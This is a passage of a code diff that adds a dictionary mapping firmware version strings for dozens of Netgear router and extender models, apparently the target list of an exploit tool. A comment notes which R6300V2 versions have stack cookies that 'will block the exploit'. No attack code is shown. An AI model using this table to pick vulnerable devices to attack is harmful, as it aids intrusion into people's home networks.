+ "V1.0.0.70_1.0.46" : "1.0.0.70",
+ "V1.0.0.68_1.0.45" : "1.0.0.68",
+ "V1.0.0.64_1.0.43" : "1.0.0.64",
+ "V1.0.0.62_1.0.42" : "1.0.0.62",
+ "V1.0.0.58_1.0.38" : "1.0.0.58",
+ "V1.0.0.50_1.0.30" : "1.0.0.50",
+ "V1.0.0.48_1.0.28" : "1.0.0.48",
+ "V1.0.0.46_1.0.26" : "1.0.0.46",
+ "V1.0.0.44_1.0.22" : "1.0.0.44",
+ "V1.0.0.34_1.0.22" : "1.0.0.34",
+ "V1.0.0.28_1.0.20" : "1.0.0.28",
+ "V1.0.0.26_1.0.19" : "1.0.0.26",
+ },
+ "EX3920" : {
+ "V1.0.0.78_1.0.51" : "1.0.0.78",
+ "V1.0.0.76_1.0.49" : "1.0.0.76",
+ "V1.0.0.72_1.0.47" : "1.0.0.72",
+ "V1.0.0.70_1.0.46" : "1.0.0.70",
+ "V1.0.0.68_1.0.45" : "1.0.0.68",
+ "V1.0.0.64_1.0.43" : "1.0.0.64",
+ "V1.0.0.62_1.0.42" : "1.0.0.62",
+ "V1.0.0.58_1.0.38" : "1.0.0.58",
+ "V1.0.0.50_1.0.30" : "1.0.0.50",
+ "V1.0.0.48_1.0.28" : "1.0.0.48",
+ "V1.0.0.46_1.0.26" : "1.0.0.46",
+ "V1.0.0.44_1.0.22" : "1.0.0.44",
+ "V1.0.0.34_1.0.22" : "1.0.0.34",
+ "V1.0.0.28_1.0.20" : "1.0.0.28",
+ "V1.0.0.26_1.0.19" : "1.0.0.26",
+ },
+ "EX6000" : {
+ "V1.0.0.38_1.0.22" : "1.0.0.38",
+ "V1.0.0.32_1.0.18" : "1.0.0.32",
+ "V1.0.0.30_1.0.17" : "1.0.0.30",
+ "V1.0.0.28_1.0.16" : "1.0.0.28",
+ "V1.0.0.24_1.0.14" : "1.0.0.24",
+ "V1.0.0.20_1.0.11" : "1.0.0.20",
+ "V1.0.0.10_1.0.6" : "1.0.0.10",
+ },
+ "EX6100" : {
+ "V1.0.2.24_1.1.134" : "1.0.2.24",
+ "V1.0.2.18_1.1.131" : "1.0.2.18",
+ "V1.0.2.16_1.1.130" : "1.0.2.16",
+ "V1.0.2.6_1.1.120" : "1.0.2.6",
+ "V1.0.1.36_1.0.114" : "1.0.1.36",
+ "V1.0.0.28_1.0.66" : "1.0.0.28",
+ "V1.0.0.22_1.0.51" : "1.0.0.22",
+ },
+ "EX6120" : {
+ "V1.0.0.48_1.0.30" : "1.0.0.48",
+ "V1.0.0.46_1.0.29" : "1.0.0.46",
+ "V1.0.0.42_1.0.27" : "1.0.0.42",
+ "V1.0.0.40_1.0.25" : "1.0.0.40",
+ "V1.0.0.36_1.0.23" : "1.0.0.36",
+ "V1.0.0.32_1.0.21" : "1.0.0.32",
+ "V1.0.0.30_1.0.20" : "1.0.0.30",
+ "V1.0.0.28_1.0.18" : "1.0.0.28",
+ "V1.0.0.26_1.0.16" : "1.0.0.26",
+ "V1.0.0.16_1.0.11" : "1.0.0.16",
+ "V1.0.0.14_1.0.10" : "1.0.0.14",
+ "V1.0.0.8_1.0.4" : "1.0.0.8",
+ "V1.0.0.4_1.0.2" : "1.0.0.4",
+ },
+ "EX6130" : {
+ "V1.0.0.30_1.0.17" : "1.0.0.30",
+ "V1.0.0.28_1.0.16" : "1.0.0.28",
+ "V1.0.0.24_1.0.14" : "1.0.0.24",
+ "V1.0.0.22_1.0.13" : "1.0.0.22",
+ "V1.0.0.20_1.0.12" : "1.0.0.20",
+ "V1.0.0.16_1.0.10" : "1.0.0.16",
+ "V1.0.0.12_1.0.7" : "1.0.0.12",
+ },
+ "EX6150" : {
+ "V1.0.0.42_1.0.73" : "1.0.0.42",
+ "V1.0.0.34_1.0.69" : "1.0.0.34",
+ "V1.0.0.32_1.0.68" : "1.0.0.32",
+ "V1.0.0.28_1.0.64" : "1.0.0.28",
+ "V1.0.0.16_1.0.58" : "1.0.0.16",
+ "V1.0.0.14_1.0.54" : "1.0.0.14",
+ },
+ "EX6200" : {
+ "V1.0.3.90_1.1.125" : "1.0.3.90",
+ "V1.0.3.88_1.1.123" : "1.0.3.88",
+ "V1.0.3.82_1.1.117" : "1.0.3.82",
+ "V1.0.3.76_1.1.111" : "1.0.3.76",
+ "V1.0.3.74_1.1.109" : "1.0.3.74",
+ "V1.0.3.68_1.1.104" : "1.0.3.68",
+ "V1.0.1.60_1.1.98" : "1.0.1.60",
+ "V1.0.0.52_1.1.90" : "1.0.0.52",
+ "V1.0.0.46_1.1.70" : "1.0.0.46",
+ "V1.0.0.42_1.1.57" : "1.0.0.42",
+ "V1.0.0.38_1.1.52" : "1.0.0.38",
+ },
+ "EX6920" : {
+ "V1.0.0.40_1.0.25" : "1.0.0.40",
+ "V1.0.0.36_1.0.23" : "1.0.0.36",
+ "V1.0.0.32_1.0.21" : "1.0.0.32",
+ "V1.0.0.30_1.0.20" : "1.0.0.30",
+ "V1.0.0.28_1.0.18" : "1.0.0.28",
+ "V1.0.0.26_1.0.16" : "1.0.0.26",
+ "V1.0.0.16_1.0.11" : "1.0.0.16",
+ "V1.0.0.14_1.0.10" : "1.0.0.14",
+ "V1.0.0.8_1.0.4" : "1.0.0.8",
+ "V1.0.0.4_1.0.2" : "1.0.0.4",
+ },
+ "EX7000" : {
+ "V1.0.1.84_1.0.148" : "1.0.1.84",
+ "V1.0.1.80_1.0.144" : "1.0.1.80",
+ "V1.0.1.78_1.0.140" : "1.0.1.78",
+ "V1.0.0.66_1.0.126" : "1.0.0.66",
+ "V1.0.0.62_1.0.122" : "1.0.0.62",
+ "V1.0.0.58_1.0.112" : "1.0.0.58",
+ "V1.0.0.56_1.0.108" : "1.0.0.56",
+ "V1.0.0.50_1.0.102" : "1.0.0.50",
+ "V1.0.0.42_1.0.94" : "1.0.0.42",
+ "V1.0.0.38_1.0.91" : "1.0.0.38",
+ "V1.0.0.36_1.0.88" : "1.0.0.36",
+ "V1.0.0.32_1.0.84" : "1.0.0.32",
+ "V1.0.0.30_1.0.72" : "1.0.0.30",
+ },
+ "LG2200D" : {
+ "V1.0.0.57_1.0.40" : "1.0.0.57",
+ },
+ "MBM621" : {
+ "V1.1.3" : "1.1.3",
+ },
+ "MBR624GU" : {
+ "V6.01.30.64WW" : "6.1.30.64",
+ "V6.01.30.61WW" : "6.1.30.61",
+ "V6.01.30.59WW" : "6.1.30.59",
+ "V6.01.30.59NA" : "6.1.30.59NA",
+ "V6.00.30.46WW" : "6.0.30.46",
+ "V6.00.28.43WW" : "6.0.28.43",
+ "V6.00.28.43NA" : "6.0.28.43NA",
+ "V6.00.26.21WW" : "6.0.26.21",
+ "V6.00.22.14NA" : "6.0.22.14NA",
+ "V6.00.22.12" : "6.0.22.12",
+ },
+ "MBR1200" : {
+ "V1.2.2.53" : "1.2.2.53",
+ },
+ "MBR1515" : {
+ "V1.2.2.68" : "1.2.2.68",
+ },
+ "MBR1516" : {
+ "V1.2.2.84BM" : "1.2.2.84BM",
+ },
+ "MBRN3000" : {
+ "V1.0.0.74_2.0.12WW" : "1.0.0.74",
+ "V1.0.0.72_2.0.12WW" : "1.0.0.72",
+ "V1.0.0.72_2.0.12NA" : "1.0.0.72NA",
+ "V1.0.0.69_2.0.12WW" : "1.0.0.69",
+ "V1.0.0.69_2.0.12NA" : "1.0.0.69NA",
+ "V1.0.0.65_2.0.12WW" : "1.0.0.65",
+ "V1.0.0.65_2.0.12NA" : "1.0.0.65NA",
+ "V1.0.0.43NA" : "1.0.0.43NA",
+ },
+ "MVBR1210C" : {
+ "V1.2.0.35BM" : "1.2.0.35",
+ },
+ "R4500" : {
+ "V1.0.0.4_1.0.3" : "1.0.0.4",
+ },
"R6200" : { + "V1.0.1.58_1.0.44" : "1.0.1.58", + "V1.0.1.56_1.0.43" : "1.0.1.56", + "V1.0.1.52_1.0.41" : "1.0.1.52", + "V1.0.1.48_1.0.37" : "1.0.1.48", + "V1.0.1.46_1.0.36" : "1.0.1.46", + "V1.0.0.28_1.0.24" : "1.0.0.28", + "V1.0.0.18_1.0.18" : "1.0.0.18", + }, + "R6200V2" : { + "V1.0.3.12_10.1.11" : "1.0.3.12", + "V1.0.3.10_10.1.10" : "1.0.3.10", + "V1.0.1.20_1.0.18" : "1.0.1.20", + "V1.0.1.18_1.0.17" : "1.0.1.18", + "V1.0.1.16_1.0.15" : "1.0.1.16", + "V1.0.1.14_1.0.14" : "1.0.1.14", + }, + "R6250" : { + "V1.0.4.38_10.1.30" : "1.0.4.38", + "V1.0.4.36_10.1.30" : "1.0.4.36", + "V1.0.4.34_10.1.28" : "1.0.4.34", + "V1.0.4.26_10.1.23" : "1.0.4.26", + "V1.0.4.20_10.1.20" : "1.0.4.20", + "V1.0.4.16_10.1.18" : "1.0.4.16", + "V1.0.4.14_10.1.17" : "1.0.4.14", + "V1.0.4.12_10.1.15" : "1.0.4.12", + "V1.0.4.8_10.1.13" : "1.0.4.08", + "V1.0.4.6_10.1.12" : "1.0.4.06", + "V1.0.4.2_10.1.10" : "1.0.4.02", + "V1.0.3.12_10.1.8" : "1.0.3.12", + "V1.0.3.6_10.1.3" : "1.0.3.06", + "V1.0.1.84_1.0.78" : "1.0.1.84", + "V1.0.1.82_1.0.77" : "1.0.1.82", + "V1.0.1.80_1.0.75" : "1.0.1.80", + "V1.0.0.72_1.0.71" : "1.0.0.72", + "V1.0.0.70_1.0.70" : "1.0.0.70", + "V1.0.0.62_1.0.62" : "1.0.0.62", + }, + "R6300" : { + "V1.0.2.80_1.0.59" : "1.0.2.80", + "V1.0.2.78_1.0.58" : "1.0.2.78", + "V1.0.2.76_1.0.57" : "1.0.2.76", + "V1.0.2.70_1.0.50" : "1.0.2.70", + "V1.0.2.68_1.0.49" : "1.0.2.68", + "V1.0.2.38_1.0.33" : "1.0.2.38", + "V1.0.2.36_1.0.28" : "1.0.2.36", + "V1.0.2.26_1.0.26" : "1.0.2.26", + "V1.0.2.14_1.0.23" : "1.0.2.14", + "V1.0.2.10_1.0.21" : "1.0.2.10", + "V1.0.0.90_1.0.18" : "1.0.0.90", + "V1.0.0.68_1.0.16" : "1.0.0.68", + }, + "R6300V2" : { + # Versions 1.0.4.12, 1.0.4.18, and 1.0.4.20 all have stack + # cookies which will block the exploit. 
However, Netgear + # stopped using stack cookies again in version 1.0.4.24 + "V1.0.4.36_10.0.93" : "1.0.4.36", + "V1.0.4.34_10.0.92" : "1.0.4.34", + "V1.0.4.32_10.0.91" : "1.0.4.32", + "V1.0.4.28_10.0.89" : "1.0.4.28", + "V1.0.4.24_10.0.87" : "1.0.4.24", + "V1.0.4.8_10.0.77" : "1.0.4.8", + "V1.0.4.6_10.0.76" : "1.0.4.6", + "V1.0.4.2_10.0.74" : "1.0.4.2", + "V1.0.3.30_10.0.73" : "1.0.3.30", + "V1.0.3.28_10.0.71" : "1.0.3.28", + "V1.0.3.26_10.0.70" : "1.0.3.26", + "V1.0.3.22_10.0.67" : "1.0.3.22", + "V1.0.3.8_1.0.60" : "1.0.3.8", + "V1.0.3.6_1.0.63CH" : "1.0.3.6CH", + "V1.0.3.2_1.0.57" : "1.0.3.2", + "V1.0.2.86_1.0.51" : "1.0.2.86", + "V1.0.2.72_1.0.46" : "1.0.2.72", + "V1.0.1.72_1.0.21" : "1.0.1.72", + }, + "R6400" : { + "V1.0.1.52_1.0.36" : "1.0.1.52", + "V1.0.1.50_1.0.35" : "1.0.1.50", + "V1.0.1.46_1.0.32" : "1.0.1.46", + "V1.0.1.44_1.0.31" : "1.0.1.44", + "V1.0.1.42_1.0.28" : "1.0.1.42", + "V1.0.1.36_1.0.25" : "1.0.1.36", + "V1.0.1.34_1.0.24" : "1.0.1.34", + "V1.0.1.26_1.0.19" : "1.0.1.26", + "V1.0.1.24_1.0.18" : "1.0.1.24", + "V1.0.1.22_1.0.17" : "1.0.1.22", + "V1.0.1.20_1.0.16" : "1.0.1.20", + "V1.0.1.18_1.0.15" : "1.0.1.18", + "V1.0.1.12_1.0.11" : "1.0.1.12", + "V1.0.1.6_1.0.4" : "1.0.1.6", + "V1.0.0.26_1.0.14" : "1.0.0.26", + "V1.0.0.24_1.0.13" : "1.0.0.24", + "V1.0.0.20_1.0.11" : "1.0.0.20", + "V1.0.0.14_1.0.8" : "1.0.0.14", + }, + "R6400V2" : { + "V1.0.4.84_10.0.58" : "1.0.4.84", + "V1.0.4.82_10.0.57" : "1.0.4.82", + "V1.0.4.78_10.0.55" : "1.0.4.78", + "V1.0.3.66_10.0.50" : "1.0.3.66", + "V1.0.2.66_10.0.48" : "1.0.2.66", + "V1.0.2.62_10.0.46" : "1.0.2.62", + "V1.0.2.60_10.0.44" : "1.0.2.60", + "V1.0.2.56_10.0.42" : "1.0.2.56", + "V1.0.2.52_1.0.39" : "1.0.2.52", + "V1.0.2.50_1.0.38" : "1.0.2.50", + "V1.0.2.46_1.0.36" : "1.0.2.46", + "V1.0.2.44_1.0.35" : "1.0.2.44", + "V1.0.2.34_1.0.22" : "1.0.2.34", + "V1.0.2.32_1.0.20" : "1.0.2.32", + "V1.0.2.14_1.0.7" : "1.0.2.14", + }, + "R6700" : { + "V1.0.2.8_10.0.53" : "1.0.2.8", + "V1.0.2.6_10.0.52" : "1.0.2.6", + 
"V1.0.1.48_10.0.46" : "1.0.1.48", + "V1.0.1.46_10.0.45" : "1.0.1.46", + "V1.0.1.44_10.0.44" : "1.0.1.44", + "V1.0.1.36_10.0.40" : "1.0.1.36", + "V1.0.1.32_10.0.38" : "1.0.1.32", + "V1.0.1.26_10.0.35" : "1.0.1.26", + "V1.0.1.22_10.0.33" : "1.0.1.22", + "V1.0.1.20_10.0.32" : "1.0.1.20", + "V1.0.1.16_10.0.30" : "1.0.1.16", + "V1.0.1.14_10.0.29" : "1.0.1.14", + "V1.0.0.26_10.0.26" : "1.0.0.26", + "V1.0.0.24_10.0.18" : "1.0.0.24", + "V1.0.0.2_1.0.1" : "1.0.0.2", + }, + "R6700V3" : { + "V1.0.4.84_10.0.58" : "1.0.4.84", + "V1.0.4.82_10.0.57" : "1.0.4.82", + "V1.0.4.78_10.0.55" : "1.0.4.78", + "V1.0.3.66_10.0.50" : "1.0.3.66", + "V1.0.2.66_10.0.48" : "1.0.2.66", + "V1.0.2.62_10.0.46" : "1.0.2.62", + "V1.0.2.60_10.0.44" : "1.0.2.60", + "V1.0.2.56_10.0.42" : "1.0.2.56", + "V1.0.2.52_1.0.39" : "1.0.2.52", + }, + "R6900" : { + "V1.0.2.8_10.0.38" : "1.0.2.8", + "V1.0.2.6_10.0.37" : "1.0.2.6", + "V1.0.2.4_10.0.35" : "1.0.2.4", + "V1.0.1.48_10.0.30" : "1.0.1.48", + "V1.0.1.46_10.0.29" : "1.0.1.46", + "V1.0.1.44_10.0.28" : "1.0.1.44", + "V1.0.1.34_1.0.24" : "1.0.1.34", + "V1.0.1.28_1.0.21" : "1.0.1.28", + "V1.0.1.26_1.0.20" : "1.0.1.26", + "V1.0.1.22_1.0.18" : "1.0.1.22", + "V1.0.1.20_1.0.17" : "1.0.1.20", + "V1.0.1.16_1.0.15" : "1.0.1.16", + "V1.0.1.14_1.0.14" : "1.0.1.14", + "V1.0.0.4_1.0.10" : "1.0.0.4", + "V1.0.0.2_1.0.2" : "1.0.0.2", + }, + "R6900P" : { + "V1.3.1.64_10.1.36" : "1.3.1.64", + "V1.3.1.44_10.1.23" : "1.3.1.44", + "V1.3.1.26_10.1.3" : "1.3.1.26", + "V1.3.0.20_10.1.1" : "1.3.0.20", + "V1.3.0.8_1.0.93" : "1.3.0.8", + "V1.2.0.22_1.0.78" : "1.2.0.22", + "V1.0.1.14_1.0.59" : "1.0.1.14", + "V1.0.0.58_1.0.50" : "1.0.0.58", + "V1.0.0.46_1.0.30" : "1.0.0.46", + }, + "R7000" : { + "V1.0.0.96_1.0.15" : "0.96", + "V1.0.1.22_1.0.15" : "1.22", + "V1.0.2.164_1.0.15" : "2.16", + "V1.0.2.194_1.0.15" : "2.19", + "V1.0.3.24_1.1.20" : "3.24", + "V1.0.3.56_1.1.25" : "3.56", + "V1.0.3.60_1.1.27" : "3.60", + "V1.0.3.68_1.1.31" : "3.68", + "V1.0.3.80_1.1.38" : "3.80", + 
"V1.0.4.18_1.1.52" : "4.18", + "V1.0.4.28_1.1.64" : "4.28", + "V1.0.4.30_1.1.67" : "4.30", + "V1.0.5.64_1.1.88" : "5.64", + "V1.0.5.70_1.1.91" : "5.70", + "V1.0.7.2_1.1.93" : "7.2", + "V1.0.7.6_1.1.99" : "7.6", + "V1.0.7.10_1.2.3" : "7.10", + "V1.0.7.12_1.2.5" : "7.12", + "V1.0.8.34_1.2.15" : "8.34", + "V1.0.9.6_1.2.19" : "9.6", + "V1.0.9.10_1.2.21" : "9.10", + "V1.0.9.12_1.2.23" : "9.12", + "V1.0.9.14_1.2.25" : "9.14", + "V1.0.9.18_1.2.27" : "9.18", + "V1.0.9.26_10.2.31" : "9.26", + "V1.0.9.28_10.2.32" : "9.28", + "V1.0.9.32_10.2.34" : "9.32", + "V1.0.9.34_10.2.36" : "9.34", + "V1.0.9.42_10.2.44" : "9.42", + "V1.0.9.60_10.2.60" : "9.60", + "V1.0.9.64_10.2.64" : "9.64", + "V1.0.9.88_10.2.88" : "9.88", + "V1.0.11.100_10.2.100" : "11.100", + }, + "R7000P" : { + "V1.3.1.64_10.1.36" : "1.3.1.64", + "V1.3.1.44_10.1.23" : "1.3.1.44", + "V1.3.1.26_10.1.3" : "1.3.1.26", + "V1.3.0.20_10.1.1" : "1.3.0.20", + "V1.3.0.8_1.0.93" : "1.3.0.8", + "V1.2.0.22_1.0.78" : "1.2.0.22", + "V1.0.1.14_1.0.59" : "1.0.1.14", + "V1.0.0.58_1.0.50" : "1.0.0.58", + "V1.0.0.56_1.0.45" : "1.0.0.56", + "V1.0.0.50_1.0.35" : "1.0.0.50", + "V1.0.0.46_1.0.30" : "1.0.0.46", + "V1.0.0.44_1.0.27" : "1.0.0.44", + }, + "R7100LG" : { + "V1.0.0.52_1.0.6" : "1.0.0.52", + "V1.0.0.50_1.0.6" : "1.0.0.50", + "V1.0.0.48_1.0.6" : "1.0.0.48", + "V1.0.0.46_1.0.6" : "1.0.0.46", + "V1.0.0.42_1.0.6" : "1.0.0.42", + "V1.0.0.40_1.0.6" : "1.0.0.40", + "V1.0.0.38_1.0.6" : "1.0.0.38", + "V1.0.0.36_1.0.6" : "1.0.0.36", + "V1.0.0.34_1.0.6" : "1.0.0.34", + "V1.0.0.32_1.0.6" : "1.0.0.32", + "V1.0.0.30_1.0.6" : "1.0.0.30", + "V1.0.0.28_1.0.6" : "1.0.0.28", + "V1.0.0.24_1.0.6" : "1.0.0.24", + }, + "R7300" : { + "V1.0.0.74_1.0.29" : "1.0.0.74", + "V1.0.0.70_1.0.25" : "1.0.0.70", + "V1.0.0.68_1.0.24" : "1.0.0.68", + "V1.0.0.62_1.0.21" : "1.0.0.62", + "V1.0.0.60_1.0.20" : "1.0.0.60", + "V1.0.0.56_1.0.18" : "1.0.0.56", + "V1.0.0.54_1.0.17" : "1.0.0.54", + "V1.0.0.52_1.0.16" : "1.0.0.52", + "V1.0.0.46_1.0.13" : "1.0.0.46", + 
"V1.0.0.44_1.0.12" : "1.0.0.44", + "V1.0.0.32_1.0.6" : "1.0.0.32", + "V1.0.0.26_1.0.6" : "1.0.0.26", + }, + "R7850" : { + "V1.0.5.48_10.0.42" : "1.0.5.48", + "V1.0.4.46_10.0.22" : "1.0.4.46", + "V1.0.4.42_10.0.12" : "1.0.4.42", + }, + "R7900" : { + "V1.0.4.22_10.0.44" : "1.0.4.22", + "V1.0.3.18_10.0.42" : "1.0.3.18", + "V1.0.3.10_10.0.38" : "1.0.3.10", + "V1.0.3.8_10.0.37" : "1.0.3.8", + "V1.0.2.16_10.0.32" : "1.0.2.16", + "V1.0.2.10_10.0.29" : "1.0.2.10", + "V1.0.1.26_10.0.23" : "1.0.1.26", + "V1.0.1.18_10.0.20" : "1.0.1.18", + "V1.0.1.12_10.0.17" : "1.0.1.12", + "V1.0.1.8_10.0.14" : "1.0.1.8", + "V1.0.1.4_10.0.12" : "1.0.1.4", + "V1.0.0.10_10.0.7" : "1.0.0.10", + "V1.0.0.8_10.0.5" : "1.0.0.8", + "V1.0.0.6_10.0.4" : "1.0.0.6", + "V1.0.0.2_10.0.1" : "1.0.0.2", + }, + "R8000" : { + "V1.0.4.46_10.1.63" : "1.0.4.46", + "V1.0.4.28_10.1.54" : "1.0.4.28", + "V1.0.4.18_10.1.49" : "1.0.4.18", + "V1.0.4.12_10.1.46" : "1.0.4.12", + "V1.0.4.4_1.1.42" : "1.0.4.4", + "V1.0.4.2_1.1.41" : "1.0.4.2", + "V1.0.3.54_1.1.37" : "1.0.3.54", + "V1.0.3.48_1.1.33" : "1.0.3.48", + "V1.0.3.46_1.1.32" : "1.0.3.46", + "V1.0.3.36_1.1.25" : "1.0.3.36", + "V1.0.3.32_1.1.21" : "1.0.3.32", + "V1.0.3.26_1.1.18" : "1.0.3.26", + "V1.0.3.4_1.1.2" : "1.0.3.4", + "V1.0.2.46_1.0.97" : "1.0.2.46", + "V1.0.2.44_1.0.96" : "1.0.2.44", + "V1.0.1.16_1.0.74" : "1.0.1.16", + "V1.0.0.110_1.0.70" : "1.0.0.110", + "V1.0.0.108_1.0.62" : "1.0.0.108", + "V1.0.0.102_1.0.45" : "1.0.0.102", + "V1.0.0.100_1.0.44" : "1.0.0.100", + "V1.0.0.90_1.0.39" : "1.0.0.90", + "V1.0.0.76_1.0.32" : "1.0.0.76", + "V1.0.0.74_1.0.31" : "1.0.0.74", + "V1.0.0.68_1.0.27" : "1.0.0.68", + "V1.0.0.46_1.0.17" : "1.0.0.46", + }, + "R8300" : { + # These version strings may be slightly off. Versions 1.0.2.128 and 1.0.2.130 only used + # the short versions, rather than the full version string like other models. 
+ "V1.0.2.130" : "1.0.2.130", + "V1.0.2.128" : "1.0.2.128", + "V1.0.2.122_1.0.94" : "1.0.2.122", + "V1.0.2.116_1.0.90" : "1.0.2.116", + "V1.0.2.106_1.0.85" : "1.0.2.106", + "V1.0.2.100_1.0.82" : "1.0.2.100", + "V1.0.2.94_1.0.79" : "1.0.2.94", + "V1.0.2.86_1.0.75" : "1.0.2.86", + "V1.0.2.80_1.0.71" : "1.0.2.80", + "V1.0.2.48_1.0.52" : "1.0.2.48", + }, + "R8500" : { + "V1.0.2.130_1.0.99" : "1.0.2.130", + "V1.0.2.128_1.0.97" : "1.0.2.128", + "V1.0.2.122_1.0.94" : "1.0.2.122", + "V1.0.2.116_1.0.90" : "1.0.2.116", + "V1.0.2.106_1.0.85" : "1.0.2.106", + "V1.0.2.100_1.0.82" : "1.0.2.100", + "V1.0.2.94_1.0.79" : "1.0.2.94", + "V1.0.2.86_1.0.75" : "1.0.2.86", + "V1.0.2.80_1.0.71" : "1.0.2.80", + "V1.0.2.64_1.0.62" : "1.0.2.64", + "V1.0.2.54_1.0.56" : "1.0.2.54", + "V1.0.2.30_1.0.43" : "1.0.2.30", + "V1.0.2.26_1.0.41" : "1.0.2.26", + "V1.0.0.56_1.0.28" : "1.0.0.56", + "V1.0.0.52_1.0.26" : "1.0.0.52", + "V1.0.0.42_1.0.23" : "1.0.0.42", + "V1.0.0.28_1.0.15" : "1.0.0.28", + }, + "RS400" : { + "V1.5.0.34_10.0.33" : "1.5.0.34", + }, + "WGR614V8" : { + "V1.2.10_21.0.52" : "1.2.10", + "V1.2.10_21.0.52NA" : "1.2.10NA", + "V1.1.24_14.0.43" : "1.1.24", + "V1.1.24_14.0.43NA" : "1.1.24NA", + "V1.1.2_1.0.23" : "1.1.2", + "V1.1.2_1.0.23NA" : "1.1.2NA", + "V1.1.11_6.0.36" : "1.1.11", + "V1.1.11_6.0.36NA" : "1.1.11NA", + "V1.1.1_1.0.20NA" : "1.1.1NA", + "V1.1.20_7.0.37" : "1.1.20", + "V1.1.20_7.0.37NA" : "1.1.20NA", + }, + "WGR614V9" : { + "V1.2.32_43.0.46" : "1.2.32", + "V1.2.32_43.0.46NA" : "1.2.32NA", + "V1.2.30_41.0.44" : "1.2.30", + "V1.2.30_41.0.44NA" : "1.2.30NA", + "V1.2.24_37.0.35" : "1.2.24", + "V1.2.24_37.0.35NA" : "1.2.24NA", + "V1.2.6_18.0.17" : "1.2.6", + "V1.2.6_18.0.17NA" : "1.2.6NA", + "V1.2.2_14.0.13" : "1.2.2", + "V1.2.2_14.0.13NA" : "1.2.2NA", + "V1.0.18_8.0.9PT" : "1.0.18", + "V1.0.18_8.0.9NA" : "1.0.18NA", + "V1.0.15_4.0.3" : "1.0.15", + "V1.0.15_4.0.3NA" : "1.0.15NA", + "V1.0.9_1.0.1NA" : "1.0.9NA", + }, + "WGR614V10" : { + "V1.0.2.66_60.0.90" : "1.0.2.66", + 
"V1.0.2.66_60.0.90NA" : "1.0.2.66NA", + "V1.0.2.60_60.0.85" : "1.0.2.60", + "V1.0.2.60_60.0.85NA" : "1.0.2.60NA", + "V1.0.2.58_60.0.84NA" : "1.0.2.58NA", + "V1.0.2.54_60.0.82" : "1.0.2.54", + "V1.0.2.54_60.0.82NA" : "1.0.2.54NA", + "V1.0.2.26_51.0.59" : "1.0.2.26", + "V1.0.2.26_51.0.59NA" : "1.0.2.26NA", + "V1.0.2.18_47.0.52" : "1.0.2.18", + "V1.0.2.18_47.0.52NA" : "1.0.2.18NA", + }, + "WGT624V4" : { + "V2.0.13_2.0.15NA" : "2.0.13.2", + "V2.0.13_2.0.14" : "2.0.13", + "V2.0.13_2.0.14NA" : "2.0.13NA", + "V2.0.12_2.0.12" : "2.0.12", + "V2.0.12_2.0.12NA" : "2.0.12NA", + "V2.0.6_2.0.6NA" : "2.0.6NA", + }, + "WN2500RP" : { + "V1.0.0.30_1.0.58" : "1.0.0.30", + "V1.0.0.26_1.0.54" : "1.0.0.26", + "V1.0.0.24_1.0.53" : "1.0.0.24", + }, + "WN2500RPV2" : { + "V1.0.1.54_1.0.68" : "1.0.1.54", + "V1.0.1.50_1.0.64" : "1.0.1.50", + "V1.0.1.46_1.0.60" : "1.0.1.46", + "V1.0.1.42_1.0.56" : "1.0.1.42", + "V1.0.0.30_1.0.41" : "1.0.0.30", + }, + "WN3000RP" : { + "V1.0.2.64_1.1.86" : "1.0.2.64", + "V1.0.1.36_1.1.47" : "1.0.1.36", + "V1.0.1.34_1.1.46" : "1.0.1.34", + "V1.0.1.18_1.1.24" : "1.0.1.18", + "V1.0.0.12_1.0.12" : "1.0.0.12", + }, + "WN3100RP" : { + "V1.0.0.20_1.0.22" : "1.0.0.20", + "V1.0.0.16_1.0.20" : "1.0.0.16", + "V1.0.0.14_1.0.19" : "1.0.0.14", + "V1.0.0.6_1.0.12" : "1.0.0.6", + }, + "WN3500RP" : { + "V1.0.0.22_1.0.62" : "1.0.0.22", + "V1.0.0.20_1.0.60" : "1.0.0.20", + "V1.0.0.18_1.0.59" : "1.0.0.18", + "V1.0.0.16_1.0.58" : "1.0.0.16", + "V1.0.0.14_1.0.54" : "1.0.0.14", + "V1.0.0.12_1.0.49" : "1.0.0.12", + }, + "WNCE3001" : { + "V1.0.0.50_1.0.35" : "1.0.0.50", + "V1.0.0.46_1.0.33" : "1.0.0.46", + "V1.0.0.44_1.0.32" : "1.0.0.44", + "V1.0.0.38" : "1.0.0.38", + }, + "WNDR3300" : { + "V1.0.45_1.0.45" : "1.0.45", + "V1.0.45_1.0.45NA" : "1.0.45NA", + "V1.0.29_1.0.29" : "1.0.29", + "V1.0.29_1.0.29NA" : "1.0.29NA", + "V1.0.27_1.0.27NA" : "1.0.27NA", + "V1.0.26_1.0.26" : "1.0.26", + "V1.0.26_1.0.26NA" : "1.0.26NA", + "V1.0.23_1.0.23NA" : "1.0.23NA", + "Version Detection Fail" : 
"1.0.14", + "Version Detection Fail" : "1.0.14NA", + }, + "WNDR3300V2" : { + "V1.0.0.26_11.0.26NA" : "1.0.0.26", + }, + "WNDR3400" : { + "V1.0.0.52_20.0.60" : "1.0.0.52", + "V1.0.0.50_20.0.59" : "1.0.0.50", + "V1.0.0.38_16.0.48" : "1.0.0.38", + "V1.0.0.34_15.0.42" : "1.0.0.34", + }, + "WNDR3400V2" : { + "V1.0.0.54_1.0.82" : "1.0.0.54", + "V1.0.0.52_1.0.81" : "1.0.0.52", + "V1.0.0.38_1.0.61" : "1.0.0.38", + "V1.0.0.34_1.0.52" : "1.0.0.34", + "V1.0.0.16_1.0.34" : "1.0.0.16", + "V1.0.0.12_1.0.30" : "1.0.0.12", + }, + "WNDR3400V3" : { + "V1.0.1.24_1.0.67" : "1.0.1.24", + "V1.0.1.22_1.0.66" : "1.0.1.22", + "V1.0.1.18_1.0.63" : "1.0.1.18", + "V1.0.1.16_1.0.62" : "1.0.1.16", + "V1.0.1.14_1.0.61" : "1.0.1.14", + "V1.0.1.12_1.0.58" : "1.0.1.12", + "V1.0.1.8_1.0.56" : "1.0.1.8", + "V1.0.1.4_1.0.52" : "1.0.1.4", + "V1.0.1.2_1.0.51" : "1.0.1.2", + "V1.0.0.48_1.0.48" : "1.0.0.48", + "V1.0.0.46_1.0.45" : "1.0.0.46", + "V1.0.0.38_1.0.40" : "1.0.0.38", + "V1.0.0.22_1.0.29" : "1.0.0.22", + "V1.0.0.20_1.0.28" : "1.0.0.20", + }, + "WNDR3700V3" : { + "V1.0.0.42_1.0.33" : "1.0.0.42", + "V1.0.0.38_1.0.31" : "1.0.0.38", + "V1.0.0.36_1.0.30" : "1.0.0.36", + "V1.0.0.30_1.0.27" : "1.0.0.30", + "V1.0.0.22_1.0.17" : "1.0.0.22", + "V1.0.0.18_1.0.14" : "1.0.0.18", + }, + "WNDR4000" : { + 